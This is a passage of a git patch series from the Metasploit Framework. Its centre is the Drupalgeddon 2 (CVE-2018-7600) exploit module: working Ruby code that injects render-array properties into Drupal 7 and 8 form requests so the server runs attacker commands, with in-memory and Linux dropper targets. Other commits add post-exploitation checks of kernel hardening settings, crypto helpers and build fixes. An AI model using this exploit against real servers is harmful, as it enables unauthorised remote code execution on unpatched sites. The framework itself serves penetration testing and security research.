Mattsson', # Vulnerability discovery + 'a2u', # Proof of concept + 'Nixawk', # Proof of concept + 'wvu' # Metasploit module + ], + 'References' => [ + ['CVE', '2018-7600'], + ['URL', 'https://www.drupal.org/sa-core-2018-002'], + ['URL', 'https://greysec.net/showthread.php?tid=2912'], + ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'], + ['URL', 'https://github.com/a2u/CVE-2018-7600'], + ['URL', 'https://github.com/nixawk/labs/issues/19'] + ], + 'DisclosureDate' => 'Mar 28 2018', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Targets' => [ + ['Drupal < 7.58, < 8.3.9, < 8.4.6, < 8.5.1', {}] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/generic', + 'CMD' => 'id; uname -a' + } + )) + + register_options([ + OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']), + OptBool.new('CLEAN_URLS', [false, 'If clean URLs are enabled', true]), + OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', true]) + ]) + end + + def check + token = Rex::Text.rand_text_alphanumeric(8..42) + + res = exploit(code: "echo #{token}") + + if res && res.body.include?(token) + return CheckCode::Vulnerable + end + + CheckCode::Safe + end + + # TODO: passthru() may be disabled, so try others + def exploit(func: 'passthru', code: payload.encoded) + if datastore['CLEAN_URLS'] + register = '/user/register' + else + register = '?q=user/register' + end + + print_status("Executing on target: #{code}") + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, register), + 'vars_get' => { + 'element_parents' => 'account/mail/#value', + 'ajax_form' => 1, + '_wrapper_format' => 'drupal_ajax' + }, + 'vars_post' => { + 'form_id' => 'user_register_form', + '_drupal_ajax' => 1, + 'mail[#type]' => 'markup', + 'mail[#post_render][]' => func, + 'mail[#markup]' => code + } + ) + + if res.nil? || res.code != 200 + print_error("Unexpected reply: #{res.inspect}") + return nil + end + + print_line(res.body) if datastore['DUMP_OUTPUT'] + + res + end + +end From 78daa283c7b466e5f3f153b0f0550d7a9de39342 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sat, 14 Apr 2018 07:33:29 +0000 Subject: [PATCH 11/65] Add new methods to Msf::Post::Linux::Kernel lib --- lib/msf/core/post/linux/kernel.rb | 80 +++++++++++++++++++++++++++++++ 1 file changed, 80 insertions(+) diff --git a/lib/msf/core/post/linux/kernel.rb b/lib/msf/core/post/linux/kernel.rb index 123c0e12e4..d9dee337e8 100644 --- a/lib/msf/core/post/linux/kernel.rb +++ b/lib/msf/core/post/linux/kernel.rb @@ -99,6 +99,86 @@ module Kernel raise 'Could not determine userns status' end + # + # Returns true if ASLR is enabled + # + # @return [Boolean] + # + def aslr_enabled? + aslr = cmd_exec('cat /proc/sys/kernel/randomize_va_space').to_s + (aslr.eql?('1') || aslr.eql?('2')) + rescue + raise 'Could not determine ASLR status' + end + + # + # Returns true if unprivileged bpf is disabled + # + # @return [Boolean] + # + def unprivileged_bpf_disabled? + cmd_exec('cat /proc/sys/kernel/unprivileged_bpf_disabled').to_s.eql? '1' + rescue + raise 'Could not determine kernel.unprivileged_bpf_disabled status' + end + + # + # Returns true if kernel pointer restriction is enabled + # + # @return [Boolean] + # + def kptr_restrict? + cmd_exec('cat /proc/sys/kernel/kptr_restrict').to_s.eql? '1' + rescue + raise 'Could not determine kernel.kptr_restrict status' + end + + # + # Returns true if dmesg restriction is enabled + # + # @return [Boolean] + # + def dmesg_restrict? + cmd_exec('cat /proc/sys/kernel/dmesg_restrict').to_s.eql? '1' + rescue + raise 'Could not determine kernel.dmesg_restrict status' + end + + # + # Returns mmap minimum address + # + # @return [Integer] + # + def mmap_min_addr + mmap_min_addr = cmd_exec('cat /proc/sys/vm/mmap_min_addr').to_s + return 0 unless mmap_min_addr =~ /\A\d+\z/ + mmap_min_addr + rescue + raise 'Could not determine system mmap_min_addr' + end + + # + # Returns true if SELinux is installed + # + # @return [Boolean] + # + def selinux_installed? + cmd_exec('id').to_s.include? 'context=' + rescue + raise 'Could not determine SELinux status' + end + + # + # Returns true if SELinux is in enforcing mode + # + # @return [Boolean] + # + def selinux_enforcing? + cmd_exec('/usr/sbin/getenforce').to_s.include? 'Enforcing' + rescue + raise 'Could not determine SELinux encforcing status' + end + end # Kernel end # Linux end # Post From b5c8b2ed19fcccb945b9cfde9610b1374d652ff9 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Sun, 15 Apr 2018 06:53:00 +0000 Subject: [PATCH 12/65] Add kaiser_enabled? and kaslr_enabled? methods --- lib/msf/core/post/linux/kernel.rb | 24 +++++++++++++++++++++++- 1 file changed, 23 insertions(+), 1 deletion(-) diff --git a/lib/msf/core/post/linux/kernel.rb b/lib/msf/core/post/linux/kernel.rb index d9dee337e8..fd0395cdb6 100644 --- a/lib/msf/core/post/linux/kernel.rb +++ b/lib/msf/core/post/linux/kernel.rb @@ -87,6 +87,17 @@ module Kernel raise 'Could not determine SMEP status' end + # + # Returns true if Kernel Address Isolation (KAISER) is enabled + # + # @return [Boolean] + # + def kaiser_enabled? + cmd_exec('cat /proc/cpuinfo').to_s.include? 'kaiser' + rescue + raise 'Could not determine KAISER status' + end + # # Returns true if user namespaces are enabled, false if not. # @@ -100,7 +111,18 @@ module Kernel end # - # Returns true if ASLR is enabled + # Returns true if Kernel Address Space Layout Randomization (KASLR) is enabled + # + # @return [Boolean] + # + def kaslr_enabled? + cmd_exec('cat /proc/cmdline').include? 'kaslr' + rescue + raise 'Could not determine KASLR status' + end + + # + # Returns true if Address Space Layout Randomization (ASLR) is enabled # # @return [Boolean] # From a1a4c636fbbacab176802c4846752971164b134a Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 16 Apr 2018 10:22:41 +0000 Subject: [PATCH 13/65] strip --- lib/msf/core/post/linux/kernel.rb | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/lib/msf/core/post/linux/kernel.rb b/lib/msf/core/post/linux/kernel.rb index fd0395cdb6..a3af1cd069 100644 --- a/lib/msf/core/post/linux/kernel.rb +++ b/lib/msf/core/post/linux/kernel.rb @@ -13,7 +13,7 @@ module Kernel # @return [String] # def uname(opts='-a') - cmd_exec("uname #{opts}").to_s + cmd_exec("uname #{opts}").to_s.strip rescue raise "Failed to run uname #{opts}" end @@ -104,8 +104,8 @@ module Kernel # @return [Boolean] # def userns_enabled? - return false if cmd_exec('cat /proc/sys/user/max_user_namespaces').to_s.eql? '0' - cmd_exec('cat /proc/sys/kernel/unprivileged_userns_clone').to_s.eql? '1' + return false if cmd_exec('cat /proc/sys/user/max_user_namespaces').to_s.strip.eql? '0' + cmd_exec('cat /proc/sys/kernel/unprivileged_userns_clone').to_s.strip.eql? '1' rescue raise 'Could not determine userns status' end @@ -127,7 +127,7 @@ module Kernel # @return [Boolean] # def aslr_enabled? - aslr = cmd_exec('cat /proc/sys/kernel/randomize_va_space').to_s + aslr = cmd_exec('cat /proc/sys/kernel/randomize_va_space').to_s.strip (aslr.eql?('1') || aslr.eql?('2')) rescue raise 'Could not determine ASLR status' @@ -139,7 +139,7 @@ module Kernel # @return [Boolean] # def unprivileged_bpf_disabled? - cmd_exec('cat /proc/sys/kernel/unprivileged_bpf_disabled').to_s.eql? '1' + cmd_exec('cat /proc/sys/kernel/unprivileged_bpf_disabled').to_s.strip.eql? '1' rescue raise 'Could not determine kernel.unprivileged_bpf_disabled status' end @@ -150,7 +150,7 @@ module Kernel # @return [Boolean] # def kptr_restrict? - cmd_exec('cat /proc/sys/kernel/kptr_restrict').to_s.eql? '1' + cmd_exec('cat /proc/sys/kernel/kptr_restrict').to_s.strip.eql? '1' rescue raise 'Could not determine kernel.kptr_restrict status' end @@ -161,7 +161,7 @@ module Kernel # @return [Boolean] # def dmesg_restrict? - cmd_exec('cat /proc/sys/kernel/dmesg_restrict').to_s.eql? '1' + cmd_exec('cat /proc/sys/kernel/dmesg_restrict').to_s.strip.eql? '1' rescue raise 'Could not determine kernel.dmesg_restrict status' end @@ -172,7 +172,7 @@ module Kernel # @return [Integer] # def mmap_min_addr - mmap_min_addr = cmd_exec('cat /proc/sys/vm/mmap_min_addr').to_s + mmap_min_addr = cmd_exec('cat /proc/sys/vm/mmap_min_addr').to_s.strip return 0 unless mmap_min_addr =~ /\A\d+\z/ mmap_min_addr rescue From 5bc24d048cf26d807e3c0df167ccf8d206cb5e9e Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 16 Apr 2018 11:51:15 +0000 Subject: [PATCH 14/65] Remove kaslr_enabled? method --- lib/msf/core/post/linux/kernel.rb | 11 ----------- 1 file changed, 11 deletions(-) diff --git a/lib/msf/core/post/linux/kernel.rb b/lib/msf/core/post/linux/kernel.rb index a3af1cd069..1a97453d8d 100644 --- a/lib/msf/core/post/linux/kernel.rb +++ b/lib/msf/core/post/linux/kernel.rb @@ -110,17 +110,6 @@ module Kernel raise 'Could not determine userns status' end - # - # Returns true if Kernel Address Space Layout Randomization (KASLR) is enabled - # - # @return [Boolean] - # - def kaslr_enabled? - cmd_exec('cat /proc/cmdline').include? 'kaslr' - rescue - raise 'Could not determine KASLR status' - end - # # Returns true if Address Space Layout Randomization (ASLR) is enabled # From f3ee870d721939ad7ddebadb342f80ad951ad142 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Mon, 16 Apr 2018 12:16:00 +0000 Subject: [PATCH 15/65] Remove selinux_enforcing? method --- lib/msf/core/post/linux/kernel.rb | 12 ------------ 1 file changed, 12 deletions(-) diff --git a/lib/msf/core/post/linux/kernel.rb b/lib/msf/core/post/linux/kernel.rb index 1a97453d8d..6cd00739aa 100644 --- a/lib/msf/core/post/linux/kernel.rb +++ b/lib/msf/core/post/linux/kernel.rb @@ -178,18 +178,6 @@ module Kernel rescue raise 'Could not determine SELinux status' end - - # - # Returns true if SELinux is in enforcing mode - # - # @return [Boolean] - # - def selinux_enforcing? - cmd_exec('/usr/sbin/getenforce').to_s.include? 'Enforcing' - rescue - raise 'Could not determine SELinux encforcing status' - end - end # Kernel end # Linux end # Post From 1900aa270813584ad6d45fcf985cc57fe86f7b16 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 17 Apr 2018 12:50:46 -0500 Subject: [PATCH 16/65] Refactor module and address review comments --- .../unix/webapp/drupal_drupalgeddon2.rb | 192 ++++++++++++++---- 1 file changed, 155 insertions(+), 37 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 3c069c0637..1a9e533e65 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -8,17 +8,23 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager def initialize(info = {}) super(update_info(info, - 'Name' => 'Drupal Drupalgeddon 2', + 'Name' => 'Drupal Drupalgeddon 2 Forms API Property Injection', 'Description' => %q{ - This module exploits a vulnerability. + This module exploits a Drupal property injection in the Forms API. + + Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable. + + Tested on 7.57 and 8.4.5. }, 'Author' => [ 'Jasper Mattsson', # Vulnerability discovery - 'a2u', # Proof of concept - 'Nixawk', # Proof of concept + 'a2u', # Proof of concept (Drupal 8.x) + 'Nixawk', # Proof of concept (Drupal 8.x) + 'FireFart', # Proof of concept (Drupal 7.x) 'wvu' # Metasploit module ], 'References' => [ @@ -27,17 +33,39 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://greysec.net/showthread.php?tid=2912'], ['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'], ['URL', 'https://github.com/a2u/CVE-2018-7600'], - ['URL', 'https://github.com/nixawk/labs/issues/19'] + ['URL', 'https://github.com/nixawk/labs/issues/19'], + ['URL', 'https://github.com/FireFart/CVE-2018-7600'], + ['AKA', 'Drupalgeddon 2'] ], 'DisclosureDate' => 'Mar 28 2018', 'License' => MSF_LICENSE, - 'Platform' => 'unix', - 'Arch' => ARCH_CMD, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, + # XXX: Using "x" in Gem::Version::new isn't technically appropriate 'Targets' => [ - ['Drupal < 7.58, < 8.3.9, < 8.4.6, < 8.5.1', {}] + ['Drupal 7.x (Unix In-Memory)', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Version' => Gem::Version.new('7.x') + ], + ['Drupal 7.x (Linux Dropper)', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Version' => Gem::Version.new('7.x') + ], + ['Drupal 8.x (Unix In-Memory)', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Version' => Gem::Version.new('8.x') + ], + ['Drupal 8.x (Linux Dropper)', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64], + 'Version' => Gem::Version.new('8.x') + ] ], - 'DefaultTarget' => 0, + 'DefaultTarget' => 2, # Drupal 8.x (Unix In-Memory) 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic', 'CMD' => 'id; uname -a' @@ -46,15 +74,16 @@ class MetasploitModule < Msf::Exploit::Remote register_options([ OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']), + OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']), OptBool.new('CLEAN_URLS', [false, 'If clean URLs are enabled', true]), - OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', true]) + OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false]) ]) end def check token = Rex::Text.rand_text_alphanumeric(8..42) - res = exploit(code: "echo #{token}") + res = execute_command(token, func: 'printf') if res && res.body.include?(token) return CheckCode::Vulnerable @@ -63,36 +92,37 @@ class MetasploitModule < Msf::Exploit::Remote CheckCode::Safe end - # TODO: passthru() may be disabled, so try others - def exploit(func: 'passthru', code: payload.encoded) - if datastore['CLEAN_URLS'] - register = '/user/register' - else - register = '?q=user/register' + def exploit + if datastore['PAYLOAD'] == 'cmd/unix/generic' + print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic') + # XXX: Naughty datastore modification + datastore['DUMP_OUTPUT'] = true end - print_status("Executing on target: #{code}") + case target.name + when /In-Memory/ + execute_command(payload.encoded) + when /Dropper/ + execute_cmdstager + end + end - res = send_request_cgi( - 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, register), - 'vars_get' => { - 'element_parents' => 'account/mail/#value', - 'ajax_form' => 1, - '_wrapper_format' => 'drupal_ajax' - }, - 'vars_post' => { - 'form_id' => 'user_register_form', - '_drupal_ajax' => 1, - 'mail[#type]' => 'markup', - 'mail[#post_render][]' => func, - 'mail[#markup]' => code - } - ) + def execute_command(cmd, opts = {}) + # TODO: passthru() may be disabled, so try others + func = opts[:func] || datastore['PHP_FUNC'] || 'passthru' - if res.nil? || res.code != 200 - print_error("Unexpected reply: #{res.inspect}") - return nil + vprint_status("Executing with #{func}(): #{cmd}") + + res = case target['Version'].to_s + when '7.x' + exploit_drupal7(func, cmd) + when '8.x' + exploit_drupal8(func, cmd) + end + + unless res && res.code == 200 + vprint_error("Unexpected final reply: #{res.inspect}") + return end print_line(res.body) if datastore['DUMP_OUTPUT'] @@ -100,4 +130,92 @@ class MetasploitModule < Msf::Exploit::Remote res end + def exploit_drupal7(func, code) + vars_get = { + 'name[#post_render][]' => func, + 'name[#markup]' => code, + 'name[#type]' => 'markup' + } + + vars_post = { + 'form_id' => 'user_pass', + '_triggering_element_name' => 'name' + } + + if datastore['CLEAN_URLS'] + uri = normalize_uri(target_uri.path, '/user/password') + else + uri = target_uri.path + vars_get = {'q' => 'user/password'}.merge(vars_get) + end + + res = send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'vars_get' => vars_get, + 'vars_post' => vars_post + ) + + unless res && res.code == 200 + vprint_error("Unexpected intermediate reply: #{res.inspect}") + return + end + + form_build_id = res.get_html_document.at( + '//input[@name = "form_build_id"]/@value' + ) + + if form_build_id + form_build_id = form_build_id.value + else + vprint_error("Unknown form_build_id: #{res.inspect}") + return + end + + vars_get = { + 'q' => "file/ajax/name/#value/#{form_build_id}" + } + + vars_post = { + 'form_build_id' => form_build_id + } + + send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'vars_get' => vars_get, + 'vars_post' => vars_post + ) + end + + def exploit_drupal8(func, code) + vars_get = { + 'element_parents' => 'account/mail/#value', + 'ajax_form' => 1, + '_wrapper_format' => 'drupal_ajax' + } + + vars_post = { + 'form_id' => 'user_register_form', + '_drupal_ajax' => 1, + 'mail[#type]' => 'markup', + 'mail[#post_render][]' => func, + 'mail[#markup]' => code + } + + if datastore['CLEAN_URLS'] + uri = normalize_uri(target_uri.path, '/user/register') + else + uri = target_uri.path + vars_get = {'q' => 'user/register'}.merge(vars_get) + end + + send_request_cgi( + 'method' => 'POST', + 'uri' => uri, + 'vars_get' => vars_get, + 'vars_post' => vars_post + ) + end + end From ff9c55207e2f69d0f8981b8767bfd3b2bc3aa9e5 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 17 Apr 2018 20:12:26 -0500 Subject: [PATCH 17/65] Move crypto methods to Rex::Crypto namespace --- lib/msf/base/simple/buffer.rb | 4 +- lib/rex.rb | 4 ++ lib/rex/crypto/aes256.rb | 33 ++++++++++++++++ lib/rex/crypto/rc4.rb | 18 +++++++++ spec/lib/rex/crypto/aes256_spec.rb | 62 ++++++++++++++++++++++++++++++ spec/lib/rex/crypto/rc4_spec.rb | 28 ++++++++++++++ 6 files changed, 147 insertions(+), 2 deletions(-) create mode 100644 lib/rex/crypto/aes256.rb create mode 100644 lib/rex/crypto/rc4.rb create mode 100644 spec/lib/rex/crypto/aes256_spec.rb create mode 100644 spec/lib/rex/crypto/rc4_spec.rb diff --git a/lib/msf/base/simple/buffer.rb b/lib/msf/base/simple/buffer.rb index 23deb89168..5047ba1c49 100644 --- a/lib/msf/base/simple/buffer.rb +++ b/lib/msf/base/simple/buffer.rb @@ -146,7 +146,7 @@ module Buffer raise ArgumentError, 'Encryption key is missing' end - buf = Rex::Text.encrypt_aes256(encryption_opts[:iv], encryption_opts[:key], value) + buf = Rex::Crypto.encrypt_aes256(encryption_opts[:iv], encryption_opts[:key], value) when 'base64' buf = Rex::Text.encode_base64(value) when 'xor' @@ -160,7 +160,7 @@ module Buffer raise ArgumentError, 'Encryption key is missing' end - buf = Rex::Text.rc4(encryption_opts[:key], value) + buf = Rex::Crypto.rc4(encryption_opts[:key], value) else raise ArgumentError, "Unsupported encryption format: #{encryption_opts[:format]}", caller end diff --git a/lib/rex.rb b/lib/rex.rb index a59bd4bd4d..008ad89555 100644 --- a/lib/rex.rb +++ b/lib/rex.rb @@ -114,6 +114,10 @@ require 'rex/compat' require 'rex/sslscan/scanner' require 'rex/sslscan/result' +# Cryptography +require 'rex/crypto/aes256' +require 'rex/crypto/rc4' + # Overload the Kernel.sleep() function to be thread-safe Kernel.class_eval(" diff --git a/lib/rex/crypto/aes256.rb b/lib/rex/crypto/aes256.rb new file mode 100644 index 0000000000..036bba7c5b --- /dev/null +++ b/lib/rex/crypto/aes256.rb @@ -0,0 +1,33 @@ +# -*- coding: binary -*- + +module Rex + module Crypto + + # Returns an encrypted string using AES256-CBC. + # + # @param iv [String] Initialization vector. + # @param key [String] Secret key. + # @return [String] The encrypted string. + def self.encrypt_aes256(iv, key, value) + aes = OpenSSL::Cipher::AES256.new(:CBC) + aes.encrypt + aes.iv = iv + aes.key = key + aes.update(value) + aes.final + end + + # Returns a decrypted string using AES256-CBC. + # + # @param iv [String] Initialization vector. + # @param key [String] Secret key. + # @return [String] The decrypted string. + def self.decrypt_aes256(iv, key, value) + aes = OpenSSL::Cipher::AES256.new(:CBC) + aes.decrypt + aes.iv = iv + aes.key = key + aes.update(value) + aes.final + end + + end +end \ No newline at end of file diff --git a/lib/rex/crypto/rc4.rb b/lib/rex/crypto/rc4.rb new file mode 100644 index 0000000000..d2ae189840 --- /dev/null +++ b/lib/rex/crypto/rc4.rb @@ -0,0 +1,18 @@ +# -*- coding: binary -*- + +module Rex + module Crypto + + # Returns a decrypted or encrypted RC4 string. + # + # @param key [String] Secret key. + # @param [String] + def self.rc4(key, value) + rc4 = RC4.new(key) + + # This can also be used to decrypt + rc4.encrypt(value) + end + + end +end \ No newline at end of file diff --git a/spec/lib/rex/crypto/aes256_spec.rb b/spec/lib/rex/crypto/aes256_spec.rb new file mode 100644 index 0000000000..271c6e9053 --- /dev/null +++ b/spec/lib/rex/crypto/aes256_spec.rb @@ -0,0 +1,62 @@ +require 'spec_helper' +require 'securerandom' + + +describe Rex::Crypto do + + let(:iv) { + SecureRandom.random_bytes(16) + } + + let(:key) { + SecureRandom.random_bytes(32) + } + + let(:value) { + 'Hello World' + } + + describe '#encrypt_aes256' do + it 'raises an exception due to a short IV' do + iv = SecureRandom.random_bytes(1) + # Because it could raise either a OpenSSL::Cipher::CipherError or an ArgumentError + # dependong on the environment, we will just expect it to raise an exception + expect { Rex::Crypto.encrypt_aes256(iv, key, value) }.to raise_exception + end + + it 'raises an exception due to a short key' do + key = SecureRandom.random_bytes(1) + # Because it could raise either a OpenSSL::Cipher::CipherError or an ArgumentError + # dependong on the environment, we will just expect it to raise an exception + expect { Rex::Crypto.encrypt_aes256(iv, key, value) }.to raise_exception + end + + it 'encrypts the string Hello World' do + encrypted_str = Rex::Crypto.encrypt_aes256(iv, key, value) + expect(encrypted_str).not_to eq(value) + end + end + + describe '#decrypt_aes256' do + it 'raises an exception due to a short IV' do + iv = SecureRandom.random_bytes(1) + # Because it could raise either a OpenSSL::Cipher::CipherError or an ArgumentError + # dependong on the environment, we will just expect it to raise an exception + expect { Rex::Crypto.decrypt_aes256(iv, key, value) }.to raise_exception + end + + it 'raises an exception due to a short key' do + key = SecureRandom.random_bytes(1) + # Because it could raise either a OpenSSL::Cipher::CipherError or an ArgumentError + # dependong on the environment, we will just expect it to raise an exception + expect { Rex::Crypto.decrypt_aes256(iv, key, value) }.to raise_exception + end + + it 'decrypts the value to Hello World' do + encrypted_str = Rex::Crypto.encrypt_aes256(iv, key, value) + decrypted_str = Rex::Crypto.decrypt_aes256(iv, key, encrypted_str) + expect(decrypted_str).to eq(value) + end + end + +end \ No newline at end of file diff --git a/spec/lib/rex/crypto/rc4_spec.rb b/spec/lib/rex/crypto/rc4_spec.rb new file mode 100644 index 0000000000..47e598c76e --- /dev/null +++ b/spec/lib/rex/crypto/rc4_spec.rb @@ -0,0 +1,28 @@ +require 'spec_helper' +require 'securerandom' + + +describe Rex::Crypto do + + describe '#rc4' do + + let(:key) { + SecureRandom.random_bytes(32) + } + + let(:value) { + 'Hello World' + } + + it 'encrypts a string' do + expect(Rex::Crypto.rc4(key, value)).not_to eq(value) + end + + it 'decrypts a string' do + encrypted_str = Rex::Crypto.rc4(key, value) + decrypted_str = Rex::Crypto.rc4(key, encrypted_str) + expect(decrypted_str).to eq(value) + end + + end +end \ No newline at end of file From 9127b70e6ed376e37b72d0555694c2665b170963 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 17 Apr 2018 20:14:32 -0500 Subject: [PATCH 18/65] Update gemfile --- Gemfile.lock | 3 --- 1 file changed, 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 285557480a..ecea27fd12 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -187,7 +187,6 @@ GEM mini_portile2 (~> 2.3.0) octokit (4.8.0) sawyer (~> 0.8.0, >= 0.5.3) - openssl (2.1.0) openssl-ccm (1.2.1) openvas-omp (0.0.4) packetfu (1.1.13) @@ -277,8 +276,6 @@ GEM rex-text rex-struct2 (0.1.2) rex-text (0.2.18) - openssl - ruby-rc4 rex-zip (0.1.3) rex-text rkelly-remix (0.0.7) From 4dd9d32d6238c9171a322d45182ccdcdfd13bc90 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 17 Apr 2018 20:32:29 -0500 Subject: [PATCH 19/65] Fix rspec --- spec/lib/rex/crypto/aes256_spec.rb | 2 +- spec/lib/rex/crypto/rc4_spec.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/spec/lib/rex/crypto/aes256_spec.rb b/spec/lib/rex/crypto/aes256_spec.rb index 271c6e9053..5fc98c029c 100644 --- a/spec/lib/rex/crypto/aes256_spec.rb +++ b/spec/lib/rex/crypto/aes256_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' require 'securerandom' -describe Rex::Crypto do +RSpec.describe Rex::Crypto do let(:iv) { SecureRandom.random_bytes(16) diff --git a/spec/lib/rex/crypto/rc4_spec.rb b/spec/lib/rex/crypto/rc4_spec.rb index 47e598c76e..00ffaf4828 100644 --- a/spec/lib/rex/crypto/rc4_spec.rb +++ b/spec/lib/rex/crypto/rc4_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' require 'securerandom' -describe Rex::Crypto do +RSpec.describe Rex::Crypto do describe '#rc4' do From a5588ec1743a39f6f9af8872b2439186c26db2f1 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Tue, 17 Apr 2018 15:57:54 -1000 Subject: [PATCH 20/65] use same datastore retry option for x86 and x64 linux stagers --- lib/msf/core/payload/linux/x64/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/payload/linux/x64/reverse_tcp.rb b/lib/msf/core/payload/linux/x64/reverse_tcp.rb index cd8f0a724c..266cf68588 100644 --- a/lib/msf/core/payload/linux/x64/reverse_tcp.rb +++ b/lib/msf/core/payload/linux/x64/reverse_tcp.rb @@ -25,7 +25,7 @@ module Payload::Linux::ReverseTcp_x64 conf = { port: datastore['LPORT'], host: datastore['LHOST'], - retry_count: datastore['ReverseConnectRetries'], + retry_count: datastore['StagerRetryCount'], sleep_seconds: datastore['StagerRetryWait'], } From b2dfe86fd835e1d4a3bcf643c814b7459ce12a5e Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 17 Apr 2018 21:39:21 -0500 Subject: [PATCH 21/65] Pass travis --- Gemfile.lock | 2 ++ modules/payloads/singles/windows/exec.rb | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index ecea27fd12..131d45af35 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -276,6 +276,8 @@ GEM rex-text rex-struct2 (0.1.2) rex-text (0.2.18) + openssl + ruby-rc4 rex-zip (0.1.3) rex-text rkelly-remix (0.0.7) diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index 753f0fff56..783319bbef 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/exec' ### # # Executes a command on the target machine -# +#w ### module MetasploitModule From 78a02462d9808660b5df841683cc0f51feccfcde Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 17 Apr 2018 21:48:17 -0500 Subject: [PATCH 22/65] Pass Travis attempt N --- Gemfile.lock | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 131d45af35..9802059891 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -187,6 +187,7 @@ GEM mini_portile2 (~> 2.3.0) octokit (4.8.0) sawyer (~> 0.8.0, >= 0.5.3) + openssl (2.1.0) openssl-ccm (1.2.1) openvas-omp (0.0.4) packetfu (1.1.13) @@ -364,4 +365,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.16.1 + 1.16.1 \ No newline at end of file From c9fd5a7d2d4bf972a0311bf24f60bae78049f4c5 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Wed, 18 Apr 2018 07:22:20 +0000 Subject: [PATCH 23/65] Add yama_installed?, yama_enabled? and selinux_enforcing? --- lib/msf/core/post/linux/kernel.rb | 42 +++++++++++++++++++++++++++++++ 1 file changed, 42 insertions(+) diff --git a/lib/msf/core/post/linux/kernel.rb b/lib/msf/core/post/linux/kernel.rb index 6cd00739aa..4b6faf62af 100644 --- a/lib/msf/core/post/linux/kernel.rb +++ b/lib/msf/core/post/linux/kernel.rb @@ -178,6 +178,48 @@ module Kernel rescue raise 'Could not determine SELinux status' end + + # + # Returns true if SELinux is in enforcing mode + # + # @return [Boolean] + # + def selinux_enforcing? + return false unless selinux_installed? + + sestatus = cmd_exec('/usr/sbin/sestatus').to_s.strip + raise unless sestatus.include?('SELinux') + + return true if sestatus =~ /Current mode:\s*enforcing/ + false + rescue + raise 'Could not determine SELinux status' + end + + # + # Returns true if Yama is installed + # + # @return [Boolean] + # + def yama_installed? + ptrace_scope = cmd_exec('cat /proc/sys/kernel/yama/ptrace_scope').to_s.strip + return true if ptrace_scope =~ /\A\d\z/ + false + rescue + raise 'Could not determine Yama status' + end + + # + # Returns true if Yama is enabled + # + # @return [Boolean] + # + def yama_enabled? + return false unless yama_installed? + !cmd_exec('cat /proc/sys/kernel/yama/ptrace_scope').to_s.strip.eql? '0' + rescue + raise 'Could not determine Yama status' + end end # Kernel end # Linux end # Post From 09e86bfbd0f1a0a74a419c530ab0b2eafe932253 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 18 Apr 2018 02:27:57 -1000 Subject: [PATCH 24/65] define merge and merge! on datastore to also merge aliases --- lib/msf/core/data_store.rb | 21 ++++++++++++++++++++- 1 file changed, 20 insertions(+), 1 deletion(-) diff --git 